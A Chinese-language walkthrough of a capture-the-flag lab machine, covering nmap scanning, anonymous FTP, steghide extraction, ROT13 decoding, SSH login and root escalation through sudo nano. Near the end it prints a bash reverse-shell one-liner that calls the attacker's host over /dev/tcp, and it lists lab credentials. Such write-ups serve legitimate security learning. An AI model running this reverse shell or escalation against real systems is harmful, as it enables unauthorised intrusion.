0x01 信息收集

起手式 NMAP扫描整个网段

nmap -sS -T4 192.168.108.1/24

扫描结果，192.168.108.130是我们的目标主机，开放了21和80端口。看到21端口就想爆破一下。不过怎么少得了fscan

直接FTP匿名登录

打开cred是base64编码，解码得到80端口web服务的登录账号密码

0x02 user.txt

登录后是这个鬼样子

然后右上角点点点，发现有个download.rar文件

下载后有两张图片和一个sudo文件

sudo文件提示我们观察文件名

Did you notice the file name? Isn't is interesting?

看到图片以及网站中的CTF关键字，应该是CTF中的隐写术，按照靶场尿性，肯定不是用国内的思路去隐写，只能查查kali里面有没有隐写术工具，百度了一下是steghide工具，直接apt安装一下

然后使用工具查看嵌入在图片里的信息，发现bmp好像要密码，jpg也要，不过不输入密码回车，可以看到有hint.py的文件

steghide info funny.bmpsteghide info funny.jpg

提取隐藏文件

steghide extract -sf funny.jpg

但是好像只是一个提示

This is_not a python file but you are revolving around.well, try_ to rotate some words too.这不是一个python文件，但您正在围绕它旋转。好吧，试着旋转一些单词。

百度搜rotate关键字，可能是rot13的解密方法，但是还有一个问题：密码是什么呢？

根据sudo的提示，注意文件名，那么直接用funny和sudo自身文件名试一下，结果sudo是正确的密码，从bmp文件中提取出user.txt

steghide extract -sf funny.bmp

打开后是一个字符串

jgs:guvf bar vf n fvzcyr bar

用rot13解密出来是一个用户名和密码

wtf:this one is a simple one

账号密码拿到后，然后登哪里呢？试了一下网页登录，不过是没用的，按照尿性，估计和SSH有关，前面端口也没有扫到SSH，说明应该是换了其他端口，全端口扫描一下。

发现有个55077端口，直接ssh连接，登录成功

发现当前目录下有6个文件夹，分别查看有什么文件

download目录下看到有flag-1文件，查看一下，发现是字符串，解码一下

The flag is the encoded string itself

好像没啥问题，看下backup.sh，好像有n00b的账号密码

0x03 权限提升

切换用户，然后按照尿性应该是sudo -l查看特权文件

n00baw3s0m3p@$$w0rd

/bin/nano文件是不需要密码的，然后呢根据百度上现有的nano提权文章

sudo /bin/nanoctrl+rctrl+xbash -i >& /dev/tcp/192.168.108.128/4444 0>&1 (反弹shell或者用其他命令啥的都可以)

然后就获得了root权限

在root文件夹拿到root.txt，完结撒花